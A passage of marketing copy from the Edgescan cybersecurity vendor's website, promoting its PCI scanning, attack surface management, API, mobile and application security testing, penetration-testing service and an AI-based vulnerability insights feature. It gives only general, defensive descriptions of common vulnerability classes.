typically have fewer web-facing applications and less expansive network architecture than their larger peers, they’re still likely to run into a threat matrix that’s challenging or even overwhelming. With lots of potential vulnerabilities to address and limited resources to do so, the EXF becomes a key tool in their remediation assignment process, offering a quick, simple, and dependable blueprint for a team scrambling into action. That said, the EXF is also a boon to large security teams managing the sprawling web-facing infrastructure of a major organization. No matter how great the organization’s resources, the internal security team is unlikely to have all the personnel necessary to devote huge amounts of time to remediating any one vulnerability. The EXF becomes their blueprint, too, and when they can move quickly and decisively against major threats, the security team can produce concrete results on the record—a crucial element to operating within a large enterprise with many stakeholders. When you can point to 12 security that you’ve closed over the last month, it goes a long way. That’s one of the many benefits of compiling all the real threats in your Edgescan dashboard, rated for their level of risk so you can fix the worst first and power on from there. That’s risk-rated remediation intelligence with Edgescan. Download the Risk Rating datasheet. DOWNLOAD THE DATASHEET ### PCI Approved PCI Approved Firms that authorize online transactions have certain information-security obligations under the law. Edgescan will partner with your team to strengthen your security posture beyond full regulatory compliance, building a cutting-edge defense for your web-facing assets. The BaselineThe Payment Card Industry Security Standards Council (PCI SSC) has established a number of requirements for firms that process financial transactions via web-facing applications. Organizations are obligated by law to establish a robust security posture in order to defend against cyber threats and safeguard customers’ personal information, including credit card details and cardholder data.The longtime core requirement is 11.2.2: firms must undergo Quarterly Vulnerability Scanning by a PCI SSC Approved Scanning Vendor (ASV). If significant issues are identified, continual rescanning is necessary until no vulnerabilities rated 4.0 or higher by the CVSS are present.Scan ComplianceEdgescan is recognized as a PCI SSC Approved Scanning Vendor (ASV), which designates a firm that conducts external vulnerability scanning services and validates a payment processor’s adherence to the scanning requirements of PCI DSS. The Edgescan solution has been fully approved for PCI ASV scanning across all geographies, and Edgescan is ISO27001-certified to handle your customers’ information with the utmost care. Evolving Demands The PCI SSC has updated the regulatory framework for firms processing payments online to keep pace with the evolving threat environment and advancements in information-security tools. From March 31, 2024, the requirements have grown to include: Annual Penetration Test 11.4.2 and 11.4.3 mandate an Annual Penetration Test on both internal and external Cardholder Data Environments (CDEs), as well as additional pen tests following significant changes to infrastructure or applications. Verification of Remediation 11.4.4 holds that organizations must achieve Verification of Remediation by conducting repeat testing to certify the effectiveness of corrective actions. Prioritization The regulations also advocate for a Risk-Based Approach to prioritizing remediation efforts. Continuous ComplianceEdgescan will probe your web-facing applications, network, and more to ensure your PCI compliance requirements are met and that you pass your quarterly scan, but many of our clients require the flexibility of conducting ASV scans themselves. Instead of once per quarter, they may choose to run them daily, weekly, or on a more ad-hoc basis.The award-winning Edgescan dashboard allows clients to initiate scans on-demand, and the results are consolidated in a single interface to allow for a more efficient and holistic approach to maintaining PCI compliance. Once the report on a system’s vulnerabilities is compiled, our expert penetration team is available to advise you on what course of action is required to pass your quarterly assessments.The platform also incorporates a guided remediation process with a variety of risk-rating tools to assist your internal security team in prioritizing the most critical threats for immediate remediation, per PCI guidance. When a vulnerability is marked as resolved in the Edgescan dashboard, a team of CREST- and OSCP-certified experts is on hand to probe that asset and verify the remediation, thereby satisfying Requirement 11.4.4.Seamless ServiceThe Edgescan solution is tailored to snap into and enhance your existing security model. With that in mind, it involves:No Agents or Software Installations: Edgescan ASV does not use agents or require you to install software to perform our scanning service.No Disruptions: When conducting a scan, Edgescan ASV does not interfere with the cardholder data system.Production-Safe Testing: Edgescan will deliver precautionary assessments of planned activities to help ensure we do not cause outages.Flexible Schedules: Edgescan offers automatic scheduling for required quarterly scans, or you can scan as often as you’d like to identify and remediate vulnerabilities on a rolling basis.24/7 Support: Leverage round-the-clock chat, email, or telephone support to understand and address issues. Maintain your coverage across all web-facing assets, be it on-site or via public, private, or hybrid cloud infrastructure.Dev Support: Scan your web applications during and after development to ensure they’re securely built and securely maintained.Beyond Compliance Edgescan ASV reports do not just satisfy PCI-ASV standards, they clear the bar with plenty of room to spare. The Edgescan ASV solution is powered with the same logic as the award-winning Edgescan continuous security testing and exposure management SaaS platform, which is used by some of the world’s largest and best-known enterprises. Clients who operate a continuous compliance model use the full Edgescan service, as it has the added flexibility of running unlimited scans for the same fixed annual cost. The regulatory framework surrounding online payment processing will continue to evolve, but regular penetration testing is now the industry standard for high-risk web-facing assets and those of critical organizational importance, as are risk prioritization tools that guide security teams through the remediation process. Verification of remediation is also essential for any internal security team seeking full confirmation that they’ve addressed a system vulnerability. The Edgescan platform provides all these elements of PCI compliance as a baseline, then offers another level of insight into your attack surface—from the network level to web-facing applications to APIs and more—to help you build a cutting-edge security framework that represents the industry standard of tomorrow. Download the PCI Approved datasheet. DOWNLOAD THE DATASHEET ### Full Stack Full Stack Many security teams rely on a growing number of partial, disparate, and siloed solutions to maintain their security posture, sometimes dozens at a time. But bad actors have a holistic view of any organization’s attack surface. Why shouldn’t your security team have the same? You can—with Edgescan. Personalized InsightsCybersecurity technology has developed in a piecemeal fashion.As new types of web-facing assets grow in prominence and become integral to the operations of large organizations—applications, APIs, IOT devices—they also become targets for malign actors. Attackers gradually expose vulnerabilities in each new component and the cybersecurity field continually responds, springing into action to develop new, specialized tools to manage each new region of the attack surface.This is the arms race between bad actors and security professionals, and each defense technology matures over time through innovation and competition between different firms offering rival solutions to manage each area.But in this model, the two competing tools both still focus on one layer of the stack, and the market for cybersecurity solutions has thus developed as a bunch of different markets for a bunch of different specialized products.For most security leaders at large organizations, the question is still, “Which tool is best to protect this layer?” But too few security teams are asking, “How do I think holistically about my attack surface, just like an attacker does? And is there a solution that will accurately detect vulnerabilities that are critical threats to our organization, regardless of where they might occur across the full stack?”Siloed SolutionsThe main result of the point-solution paradigm is that many organizations have built up an unwieldy set of solutions, each dedicated to its own layer of the stack. In many cases, this array of different tools is unmanageable because of the sheer number of moving parts and the difficulty in getting them—and the security team members managing them—to talk to each other effectively.“The reality of security today is that security leaders have too many tools,” Gartner’s Top Security and Risk Trends for 2021 found. Security leaders reported having an average of 16—yes, sixteen—or more tools in their portfolio. 12% said they had 46 or more!These arrangements are far too complex and require excessive human resources to manage, which is why 80% of organizations are interested in a vendor-consolidation strategy. Large security vendors are responding with more integrated products, but these projects are still developing and in some cases are operating on a timeline of years.If you’re going to transform your security approach into a consolidated, full-stack strategy—and present this plan of action to other stakeholders within your organization—it needs to be a question of months, not years. Wait—What is the Full Stack? It’s a common term in IT and software-development circles—a “full-stack developer” is often in high demand—but what does this term signify in the context of vulnerability management? The stack has five distinct layers: 1. Web Application Layer Including APIs, website, and mobile 2. Hosting Environment  Web application server 3. Host Operating System Underlying host infrastructure 4. Host Machine Services Network protocol, services and ports 5. Underlying Network Associated devices including IOT, firewalls, and routerThe Superior ApproachThe good news is that there’s already a comprehensive solution on the market, and it will streamline your operations, lower your risk, build efficiency, and save you money.Edgescan’s continuous security testing and exposure management SaaS platform delivers:The Full Picture: Get a comprehensive view of your attack surface across all your web-facing assets, from applications to APIs to the host network and more. Map all your vulnerabilities and assess them, regardless of where they might be lurking in your network infrastructure.Validation: With a hybrid verification approach, automated assessments are backed by human expertise from dedicated penetration testers, so you can have full confidence that all the threats identified across every layer of your stack are real, free of false positives, and all in one place: the Edgescan dashboard.Streamlined Operations: With point solutions targeting different layers, there will at times be multiple tickets with multiple vendors targeting one vulnerability. With a single solution, you get one alert in a single point of contact—the Edgescan dashboard—for a singular view.Unified Strategy: With a single platform featuring risk-rated results, the security team can pinpoint the most critical threats across the whole stack for prioritized remediation and develop a holistic strategy for continuous risk management.Compliance: Whatever your specific regulatory framework, it is likely to feature requirements that span across the whole stack. It’s about managing risk, regardless of where threats emerge. Why not use a single solution to ensure continuous compliance?Cost: The overhead expenses with a siloed-layer approach have many layers themselves: setup costs, training to build your staff’s skills to operate specialized tools, maintenance on multiple software sets, costs to build integration and communication between point solutions. Even if yours is a large organization that can afford to “manhandle” the integration problem to piece together a full-stack view of your risk—an option not available to small and midsize companies—why not put your money into setup, training, and maintenance on a singular, comprehensive solution?Think Like an InvaderIt has become the norm for many organizations’ internal security teams to address each layer of the stack separately, shopping out specialized, point-scanning tools and building up staffing expertise to run each of these tools. This is known as a “best-of-breed” approach, but while the focus on each individual layer might be the norm, it has actually created a systemic problem.Think about your attack surface like an attacker would. Bad actors are constantly scouring your entire stack, hunting for a security gap or awaiting a lapse in judgment. The attacker is not fixated on one layer or another of your stack, be it an application or an API or your core network. They don’t care about the individual layers, they have a composite view and simply want the easiest path with the least effort offering the highest chance to secure their goal. They scour the entire attack surface for the most critical vulnerabilities, anywhere there’s a window to wedge open. Once they’re inside, they seek to escalate privileges and maximize their penetration—and the havoc they can wreak—throughout your systems.The typical enterprise cybersecurity department has gone down the path of a siloed, individual-layer approach. That’s become the industry standard by default based on how technologies have been developed and how markets have grown up around them. But there’s no need to make the best of—or even double down on—a flawed approach by devoting more time and resources to those individual tools and building a system to share data and information between them.Effective consolidation of disparate platforms could take years to implement, but there’s a comprehensive, full-stack solution available to leave this paradigm behind. We don’t have to allow history to define us, particularly when we know one thing for sure: Your attacker is hoping you do not go Full Stack. Download the Full Stack datasheet. DOWNLOAD THE DATASHEET ### AI Insights AI Insights Utilize Edgescan AI Insights to analyze vulnerability data in real-time. In today’s rapidly evolving digital landscape, organizations face an array of growing and diversified cyber threats. Their security teams face difficult questions:“What vulnerabilities should we focus on?”“What type of training for our developers would help improve our security posture?”“Which assets are potentially exposed to ransomware attack?”The answers are more complex than ever — and more specific to each individual organization. Traditional methods often fall short in providing timely and actionable advice, but AI Insights by Edgescan leverages cutting-edge machine-learning technology to empower an organization’s information-security team to make informed decisions in real time and strengthen their security posture on a continuous basis.By analyzing vulnerability data with Amazon Bedrock and a tuned version of Anthropics Claude, Edgescan delivers personalized, tactical recommendations for mitigating risk, prioritizing remediation efforts, and maintaining compliance. Personalized Insights The engine delivers strategic analysis tailored to your organization’s specific vulnerability data and systems architecture while incorporating Edgescan’s deep knowledge of the prevailing cyber threat environment. Dynamic and ScalableThe solution analyzes a vast data lake of over 15,000,000 verified vulnerabilities to generate actionable insights, and can adapt to your organization’s needs to provide intelligence that's specific to one unit of your business or applicable across multiple.These insights will continuously update as your business grows and your security posture evolves, and reports are directly linked to live vulnerabilities within your systems so you can take prompt action with full context.Threat-Based PrioritizationAddress the most critical issues first with insights that draw on real-world threat analysis, ransomware intelligence, and a vast reservoir of metadata.Ransomware Risk AssessmentThe Edgescan engine evaluates vulnerabilities when they’re uncovered to specifically assess the risk that they could be exploited by ransomware.Compliance GuidanceThis cutting-edge intelligence provides guidance as you move into full compliance with regulatory frameworks such as CIS, PCI-DSS, DORA, HIPAA, ISO, SOC2, GDPR, and more.Training FocusGet sharp insight into where you can best allocate resources for developer education and technical training based on trends in the vulnerability landscape, the current and future rate at which a specific vulnerability might occur, and the associated risk profile of that vulnerability with respect to your organization.With this informed view of the landscape, you can guide your investments in training and education to reduce vulnerability recurrence, improve overall security expertise, and maximize value for your dollar.Exploitable Vulnerabilities What are your current open vulnerabilities, and what are the associated exploit codes to look out for as you go about prioritization and remediation? AI Insights by Edgescan has the answers. Anomaly Detection Identify unusual patterns in in your data with AI Insights, including vulnerability clustering, frequent exposure types, and trends across your entire cyber estate or one particular business unit. Your Data is Safe with AI InsightsEdgescan does not pass any identifiable data to our AI. This approach is designed to ensure privacy and data security, a common issue with AI services. AI Insights can also be disabled if this kind of service is "not your thing.” Download the AI Insights datasheet. DOWNLOAD THE DATASHEET ### Features The Edgescan Platform Features AI Insights Full Stack Integrations PCI Approved Risk Rating Support False-positive Free! The continuous security testing and exposure management SaaS platform that eliminates the need for tool configuration, deployment, or management. By providing vulnerability intelligence and remediation information along with human guidance and vulnerability verification, we help our customers prevent security breaches, safeguarding their data and IT assets.​ AI Insights In today’s rapidly evolving digital landscape, organizations face an array of growing and diversified vulnerabilities and a growing number of complex questions when it comes to identifying them and prioritizing them for remediation. How do they fit in the global threat matrix? What are the associated exploit codes? AI Insights by Edgescan has these answers and more. Learn More Full Stack Many security teams rely on a growing number of partial, disparate, and siloed solutions to maintain their security posture, sometimes dozens at a time. But attackers don’t care which layer of your attack surface they access—they’re just looking for vulnerabilities to exploit. To think like an attacker and maximize your systems’ resilience, choose Edgescan’s comprehensive solution and streamline your operations, lower your risk, build efficiency, and save money. Learn More Integrations Businesses today depend on a range of different solutions to coordinate their workflow, communication, asset management, webhooks, and more. Edgescan’s continuous security testing and exposure management SaaS platform seamlessly integrates into your operational ecosystem, working in harmony with your leading technology solutions like AWS, Google Cloud, and Microsoft Azure using an API-first approach that will enhance your overall security posture. Learn More PCI Approved The Payment Card Industry Security Standards Council (PCI SSC) has established a number of requirements for firms that process financial transactions via web-facing applications, including Quarterly Vulnerability Scanning by a PCI SSC Approved Scanning Vendor (ASV) and an Annual Penetration Test. The Edgescan platform is PCI-approved and ready to bring your enterprise into full compliance with all applicable regulations. Learn More Risk Rating Secure what matters, starting with what matters most. With Edgescan’s hybrid validation approach, you’ll always get a list of vulnerabilities across your full stack that’s virtually free of false positives. But what should you fix first? The answer will deliver value back to your business in the form of time and money, all while strengthening your security posture. Edgescan consistently delivers those answers to organizations large and small with data-powered tool sets backed by the human element: on-demand support from CREST- and OSCP-certified experts. This is prioritized threat intelligence with a human touch. Learn More Expert Support When you enlist Edgescan’s continuous security testing and exposure management SaaS platform, you gain a team of CREST- and OSCP-certified experts who will partner with your internal security professionals to strengthen your security posture. Our seasoned penetration testers are on call throughout every stage of the process, from activation to validation to remediation and beyond. Learn More ### Attack Surface Management Attack Surface Management (ASM) Complete visibility. Unified view. Edgescan ASM provides immediate asset discovery and visibility of an enterprise’s internet-facing estate, then continuously monitors the attack surface as it evolves and changes. Visibility is Key to Breach Prevention In today’s multi-cloud world, enterprises require an external attack surface management solution that effectively inventories, monitors and manages their corporate assets and digital footprint. An ad-hoc approach simply no longer works to manage external attack surfaces. Manual processes and legacy tools make managing your attack surface complex and expensive, and results are flooded with false positives and human errors. The more an organization grows the larger the attack surface becomes, increasing your risk exposure. Visibility of the Entire Ecosystem Edgescan’s external Attack Surface Management (ASM) is our most advanced solution yet, designed to detect threats across external services and bring unknowns into the platform for investigation by the security team. It solves the lack of visibility and remediation velocity that occurs with legacy tools and manual processes, making it the cornerstone of any modern-day continuous threat exposure management (CTEM) program. Download the ASM datasheet to learn more. DOWNLOAD THE DATASHEET Leverage cyber analytics and human expertise Edgescan ASM uncovers attack vectors (two examples: ransomware and phishing) that can be used to breach your most critical assets, including data exposures and misconfigurations. The platform leverages both vulnerability data and business context to prioritize risk. Interactive Tour Never compromise threat protection. Request a Demo According to Gartner®... “By 2026, organizations prioritizing their security investments, based on a continuous threat exposure management program, will realize a two-third reduction in breaches."2/3Reductionin breaches Benefits of using Attack Surface Management Complete visibility The platform intelligently probes and identifies all networking devices, internet-facing devices, platforms, operating systems, databases, and web applications. It finds unknown assets across the entire internet, identifies security blind spots from discovered assets, discovers APIs, enumerates shadow IT and automates the analysis of changes across the entire IT ecosystem. Map and inventory DNS/internet records Discover existing records related to your deployed systems, servers, websites, APIs and applications.Find and inventory related subdomains or obfuscated records that may direct an attacker to your internet footprint. Unlimited and on-demand investigations Run proactive and continuous investigations at the pace your organization requires.The platform also provides complete flexibility to modify their deployment models whenever needed. Get alerts for discoveries and exposures Set up custom alerts and get notified of discoveries, then track and inventory exposures. Receive notifications when new systems are deployed, decommissioned or a system changes.Edgescan Attack Surface Management (ASM) is a software as a service, sold as an annual subscription. Request a Demo See How We Do Risk Management Edgescan Attack Surface Management’s core purpose is to discover unknown domains, subdomains, related domains, and APIs, identifying security weaknesses such as misconfigurations, software vulnerabilities, exposed credentials and shadow IT that can be exploited by malign actors. Take video tour ### API Security Testing API Security Testing Discovery + Automation + Humans + AI = Unparalleled CTEM API discovery and testing gives vital protection for this increasingly critical component of the modern application. API Risk is Increasing, Not Going Away​ Actual deployment data from Edgescan customers reveals a 320% rise in API vulnerability in 2022 – that is a shocking number.And to top it off, Gartner research indicates that API abuse will become the most frequent attack vector in the years to come. Don’t let your company become a news headline. Time to get your security under control. Know Your APIs, Scan Your APIs​ Don’t confuse API security configuration assessment with traditional vulnerability scanning – it is different. Using multi-layer probing technology, the Edgescan API discovery engine utilizes asynchronous port scanning to identify and then monitor network changes. It automatically discovers active API endpoints across your entire attack surface and profiles from given endpoints. Download the API datasheet to learn more. DOWNLOAD THE DATASHEET Complete cloud coverage​ Discover hidden and rogue APIs across your cloud providers including AWS, Microsoft Azure, GCP, VMware NSX, and Cisco ACI.Our multi-layered approach to discovering APIs results in a confidence interval describing if an API is actually present.API discovery works by applying specialised probing traffic across each endpoint and evaluating the results. This multi-layered approach results in detection of APIs based on responses to the probes sent. Interactive Tour Securing APIs is as easy as one, two, three... Upgrade your API security posture to Proactive with the Edgescan API security solution.Discover – Automate – Penetration Test. 1. DiscoverIdentify known and rogue APIs on each host across your IP/CIDR ranges using patented, multi-layer, production-safe API probing technology. 2. AutomateDetect security vulnerabilities with accuracy to keep pace with your ever-changing IT landscape. 3. Pen TestA manual penetration test is conducted on every business-critical API. In-depth approach to securing APIs Download API Discovery Journey 90% of web application attacks target APIs According to the 2024 Data Breach Investigations Report (DBIR) by Verizon, 90% of web application attacks target APIs, demonstrating their critical role in application security. 90% Percent of attacks targeting APIs Benefits of API Security Testing API discovery across your global ecosystem Identify known and rogue APIs on each host across your IP/CIDR ranges using patented, multi-layer, production-safe API probing technology. Accurately monitor and track changes Map out entire APIs to ensure a rigorous assessment and detect changes by consuming OpenAPI/Swagger/GraphQL files. Proactive and continuous API protection Establish unfettered monitoring and defense against botnets, advanced threats, and DDoS with on-demand and real-time alerts. Complete cloud coverage Discover hidden and rogue APIs across your cloud providers including AWS, Microsoft Azure, GCP, VMware NSX, and Cisco ACI.Edgescan API Security Testing is a software as a service, sold as an annual subscription. Request a Demo High-risk API vulnerabilities discovered by Edgescan Broken object-level authorization APIs often expose endpoints handling object identifiers. Any function that accepts users input and uses it to access a data source can create a Level Access Control issue, widening the attack surface. Object-level authorization checks should be carried out on all such functions. Broken user authentication Attackers often take advantage of incorrectly applied authentication mechanisms. They may compromise an authentication token or exploit flaws in implementation to pose as another user, either on a one-time basis or permanently. If the system’s ability to identify the client/user is compromised, so is the overall API’s security. Excessive data exposure Developers often rely on the client side to filter the data before displaying it to the user. This can create serious security issues—data must always be filtered at the server side, and only the relevant information should be delivered to the client side. Lack of resources and rate limiting APIs often don’t restrict the number or size of resources that the client/user can request. This can impact the performance of the API server, resulting in Denial of Service (DoS), and exposing authentication vulnerabilities, enabling brute force attack. Broken function-level authorization Authorization flaws often result from overly complex access control policies, or if there is no clear separation between regular and administrative functions. Attackers can exploit these vulnerabilities to gain access to a user’s resources or perform administrative functions. Mass assignment Mass assignment typically results from the binding of client-provided data (i.e. JSON) to a data model based on an allowlist, without proper filtering of properties. Attackers can modify object properties in a number of ways—they can explore API endpoints, read the documentation, guess object properties, or provide additional properties through request payloads. Security misconfiguration Security misconfiguration often results from inadequate default configurations, ad-hoc or incomplete configurations, misconfigured HTTP headers or inappropriate HTTP methods, insufficiently restrictive Cross-Origin Resource Sharing (CORS), open cloud storage, or error messages that contain sensitive information. Injection Injection flaws (including SQL injection, NoSQL injection, and command injection) involve data that is sent to an interpreter from an untrusted source via a command or query. Attackers can send malicious data to trick the interpreter into executing dangerous commands, or allow the attacker to access data without the necessary authorization. ### Mobile Mobile Application Security Testing (MAST) Vulnerability Assessment + Penetration Testing + Device Forensics Comprehensive mobile application security testing that addresses the unique threats that mobile apps often present. Built for Mobile Apps As organizations increasingly provide mobile applications to enable their remote workforce and boost productivity, their security teams must ensure the safety and integrity of these mobile devices, apps and data. With the rapid and expanding use of mobile apps in the workforce comes an extended attack surface for cybercriminals to potentially access. Complete Coverage for iOS & Android​ Mobile risk assessments discover and examine all assets within your mobile devices and applications to expose vulnerabilities and threats that may jeopardize data security or performance. MAST includes a device forensics component that’s unique to the mobile attack surface. It is designed to detect leakage of data onto a device, including jailbroken devices with their associated risks. Download the MAST datasheet to learn more. DOWNLOAD THE DATASHEET Make mobile apps safe The mobile application threat landscape is increasingly complex and dynamic, posing substantial risks to both individuals and organizations. As enterprise mobile app usage increases, it is essential to implement a robust security testing program and stay informed about evolving threats to safeguard sensitive information.Ensure your applications and devices remain secure. Our continuous security testing and device forensics solution gives you complete coverage across your mobile application ecosystem. Interactive Tour A single-pane-of-glass view Edgescan Mobile expands its industry-leading vulnerability assessment and penetrating-testing capabilities into mobile environments, providing complete testing coverage for iOS and Android. Using our unique hybrid approach provides automated vulnerability intelligence coupled with validation and human expertise, we test all relevant mobile components and provide the results in the Edgescan platform with an intuitive ‘single-pane-of-glass’ view. 1. Edgescan starts with ingesting the API components used by mobile devices and applications into its platform. 2. Then our vulnerability scanning engine builds a precise profile of each application and runs an assessment of it and the host-server layer. 3. After the initial scan is completed, a manual penetration test is performed against the API/App, to test for business logic vulnerabilities and vulnerabilities that legacy scanners cannot find. 4. Edgescan then downloads a build of the native mobile application onto our test devices and begins deep testing and device forensics. 5. All results are provided to the Edgescan platform, which allows for unlimited retesting and reporting, while ensuring data is safely stored, transmitted, and secured in your mobile environment. 1. Edgescan starts with ingesting the API components used by mobile devices and applications into its platform. 2. Then our vulnerability scanning engine builds a precise profile of each application and runs an assessment of it and the host-server layer. 3. After the initial scan is completed, a manual penetration test is performed against the API/App, to test for business logic vulnerabilities and vulnerabilities that legacy scanners cannot find. 4. Edgescan then downloads a build of the native mobile application onto our test devices and begins deep testing and device forensics. 5. All results are provided to the Edgescan platform, which allows for unlimited retesting and reporting, while ensuring data is safely stored, transmitted, and secured in your mobile environment. Mobile apps have at least one critical vulnerability In a recent study by Check Point Research in 2023, approximately 75% of mobile applications have at least one critical vulnerability. 75% Mobile applications with at least one critical vulnerability Benefits of using Mobile Application Testing Full-stack security Full-stack security in one platform that combines API vulnerability assessment, pentesting, and mobile forensic analysis in a unified platform – simplifying daily operations. Prioritized, actionable results Only real, prioritized and actionable results are delivered, eliminating the false-positive "noise" to reduce costs and save time. Customizable reporting Risk-rated results with prioritized remediation. Edgescan employs several risk scoring systems (i.e., CVSS, CISA KEV, EPSS) and our own Validated Security Score to risk-rate results. Certified experts Access to CREST-certified security analysts that will test and expedite the effective implementation of your cloud, network and mobile security strategy. Meet compliance Edgescan is a certified PCI-ASV and delivers testing covering the OWASP Top 10, WASC threat classification, CWE/SANS Top 25. Full-stack security Full-stack security in one platform that combines API vulnerability assessment, pentesting, and mobile forensic analysis in a unified platform – simplifying daily operations. Prioritized, actionable results Only real, prioritized and actionable results are delivered, eliminating the false-positive "noise" to reduce costs and save time. Customizable reporting Risk-rated results with prioritized remediation. Edgescan employs several risk scoring systems (i.e., CVSS, CISA KEV, EPSS) and our own Validated Security Score to risk-rate results. Certified experts Access to CREST-certified security analysts that will test and expedite the effective implementation of your cloud, network and mobile security strategy. Meet compliance Edgescan is a certified PCI-ASV and delivers testing covering the OWASP Top 10, WASC threat classification, CWE/SANS Top 25.Edgescan Mobile Application Security Testing (MAST) is a software as a service, sold as an annual subscription. Request a Demo Never compromise threat protection. Request a Demo ### Dynamic Application Security Testing Dynamic Application Security Testing (DAST)​ Validated results. Enterprise scale. AI Advisory. The human layer to our service that ensures accurate vulnerability risk, minimizing of false positives, and prioritized fixes with proven exploits. Continuous Security Testing Today’s enterprises deploy a wide range of Layer 7 services with APIs and microservices beginning to replace many web applications across the enterprise space. These applications are under a regime of frequent change, and security testing of such systems in terms of security posture is of vital importance.  The Edgescan DAST solution provides full stack coverage of your entire application attack surface, with validated and proven vulnerabilities delivered to you as often as you need. We align your scanning frequency to your remediation program to ensure effective and efficient use of the most accurate DAST solution on the market. Industrial-Scale Coverage​ From one application to 10,000, every web application assessed gets the “full-stack” treatment, meaning the application undergoes penetration testing and automated vulnerability assessment. Each and every exposure that is discovered is assessed for severity and whether it is listed as a vulnerability currently being exploited on the public Internet. It’s validated to determine if it is exploitable and a real risk. This makes prioritization much easier.Each vulnerability is verified by our team of certified experts to ensure that only REAL threats are escalated. Edgescan customers never experience false positives or false alarms. Download the Dynamic Application Security Testing datasheet to learn more. DOWNLOAD THE DATASHEET Validated vulnerability scanning on demand and on a schedule, as often as you need it Our hybrid process of advanced scanning automation and cyber analytics combined with human intelligence is what differentiates us from scanning tools and traditional pen testing services. Integrations Complete visibility to expose weaknesses and risk across your deployed application and web services Edgescan relays verified vulnerability data into the existing CI/CD toolset, so DevOps teams have the critical data they need earlier in the software development lifecycle. Organizations spend 25% of their time managing security alerts A study by the Ponemon Institute found that organizations spend an average of 20,000 hours annually dealing with false positives, leading to a significant reduction in productivity. This time expenditure equates to about 25% of the total time spent on managing security alerts. 0 hrs Average annual hours spent dealing with false positives. Benefits of Dynamic Application Security Testing Hybrid approach to assessments Applications are assessed using the platform’s automated tools combined with human expertise and cyber analytics resulting in high accuracy and industrial-scale coverage, eliminating false positives. Integrates with existing tools Edgescan provides verified vulnerability data into your existing CI/CD tool stack so developers and operations teams have the critical data they need earlier in the software development lifecycle.The platform seamlessly integrates alerts and notifications with your installed third-party systems for complete visibility across your tool stack. Customizable reporting Enables auditing and trend analysis by tracking closed vulnerabilities, vulnerability age, posture status, and many other security metrics. Also create API-based reporting for GRC integrations per asset. No more sifting through pages of data and clunky PDFs. Unlimited and on-demand vulnerability assessments and retesting Retest as often as needed to verify mitigation at no additional cost – providing peace of mind.Edgescan Dynamic Application Security Testing (DAST) is a software as a service, sold as an annual subscription. Request a Demo Never compromise threat protection. Request a Demo ### Penetration Testing as a Service Penetration Testing as a Service (PTaaS) Human Experts + Automation + Analytics + AI On-demand penetration testing with unlimited retests, expert remediation guidance, proven exploits, validated risk, streamlined reports, and unlimited vulnerability assessments Unique Hybrid Approach Our penetration testing as a service (PTaaS) is a hybrid solution that combines the breadth of automation with the depth of human assessment, seamlessly integrated with advanced vulnerability management and cyber analytics. The pen testing platform includes in-depth validated vulnerability assessments, automatically validates risk, and then rates that risk against a suite of risk databases. Penetration testing as a service (PTaaS) can be used to assess web applications, APIs and network/cloud devices. Certified Experts Bring Intelligence This is where the Edgescan advantage comes into full play. The unique intelligence behind the hybrid penetration testing solution comes from our team of security experts who are battle-hardened with industry accreditations such as CREST, OSCP, CEH. Their experience and expertise provides critical insight which uniquely supplements our automated penetration testing services platform. Download the PTaaS datasheet to learn more. DOWNLOAD THE DATASHEET We provide real and actionable results Our hybrid process of advanced scanning automation and cyber analytics combined with human intelligence is what differentiates us from scanning tools and traditional pen testing services. Interactive Tour How it works PTaaS is powered by Edgescan's suite of solutions. The scanning engine speeds up and assists with reconnaissance and discovery, allowing Edgescan to scale continuous testing without sacrificing accuracy. 1. During an assessment, the Edgescan validation engine queries millions of vulnerability examples stored in our data lake. ​ 2. Vulnerability data is then run through our proprietary analytics models to determine if the vulnerability is a true positive. 3. If it meets a certain numeric threshold it is released to the customer; we call this an auto-commit vulnerability. 4. If the confidence level falls below the threshold or the vulnerability is of critical or high severity, then the vulnerability is flagged for expert validation by an Edgescan security analyst. Learn more about Pen Testing as a Service. Take a guided walk-through Request a Demo Organizations lack the skills to conduct penetration tests 67% of organizations say they do not have the necessary skills to conduct thorough penetration tests. This statistic is drawn from the Ponemon Institute's report on the state of penetration testing, emphasizing a critical gap in expertise within organizations. 67% Organizations Lacking the Skills to Pen Test Benefits of using a PTaaS testing solution Certified Experts​ Edgescan is a CREST certified organization, combining years of experience with top industry accreditations to deliver industry-recognized foremost service.​ Customizable reporting Enables auditing and trend analysis by tracking closed vulnerabilities, vulnerability age, posture status, and many other security metrics. You can also create API-based reporting for GRC integrations per asset. No more sifting through pages of data and clunky PDFs. Premium support Dedicated support from a certified pen testing team. AI Insights provides real-time tactical advice to assist in immediate security posture improvement. Depth and breadth of coverage Includes Edgescan DAST, Edgescan DAST for APIs, and/or Network Vulnerability Management for underlying hosting infrastructure.Edgescan Penetration Testing as a Service (PTaaS) is a software as a service, sold as an annual subscription. Request a Demo Types of penetration testing API PTaaS Continuous assessment using a combination of both automated tooling and certified CREST/OSCP expertise, smart API specific security automation and human expertise. On-demand penetration testing coupled with continuous vulnerability assessment, exposure validation, risk rating and support. Application PTaaS Continuous web application assessment using a combination of both automated tooling and certified CREST/OSCP expertise. On-demand penetration testing coupled with continuous vulnerability assessment, exposure validation, risk rating and support. Authenticated and unauthenticated testing for complete web application coverage. Network/Device PTaaS Continuous internal and external assessments of networks, hosts and devices, using a combination of both automated tooling and certified CREST/OSCP expertise. On-demand penetration testing coupled with continuous vulnerability assessment, exposure validation, risk rating and support. Authenticated and unauthenticated testing for complete coverage. Penetration Testing as a Sevice FAQs How does the cost-effectiveness of Penetration Testing as a Service compare to maintaining an internal pen testing team? Cost-effectiveness factors are complex and depend on several factors including:Size of an organizationScope of the target testing areaComplexity of the environmentMethodology used in testingRetesting and remediation supportSkill set possessed by the pen testing teamIn many cases, Penetration Testing as a Service(PTaaS) is more cost-effective than conducting pen testing internally with existing resources. On average, pen testing as a service can reduce costs by as much as 30% – and countless hours for customers.Penetration Testing as a Service Reduces Overhead and Costs by 30%For large, established enterprises with appropriate staffing and significant industry expertise, utilizing PTaaS increases the cost-effectiveness, accuracy, and productivity of in-house testing. Organizations of all sizes benefit from:Reduced overhead of SecOps teams and full-time employeesService delivered by an experienced expert full-time teamAccurate results validated by a team dedicated to vulnerability intelligence.Unbiased assessment from a third-partyExtended knowledge and familiarity with new products and technologiesMeet compliance regulations: HIPAA, PCI DSS, TIBER EU, CBEST, SOC 2, ISO 2700, etc.Faster time to discovery and remediationUnlimited, retestingRemediation support from certified expertsGreater scale, agility, risk awareness, and organizational resilienceThe additional knowledge and expertise provided by PTaaS complements that of most organizations’ IT security teams and helps maintain industry compliance. Providing real and actionable results based on risk-rated results with prioritized remediation expedites and optimizes the whole testing process. Furthermore, the cost of employing PTaaS vs. the cost and ramifications of a data breach due to an unknown security loophole not discovered by internal pen testers, is far more advantageous. PTaaS helps ensure better coverage, 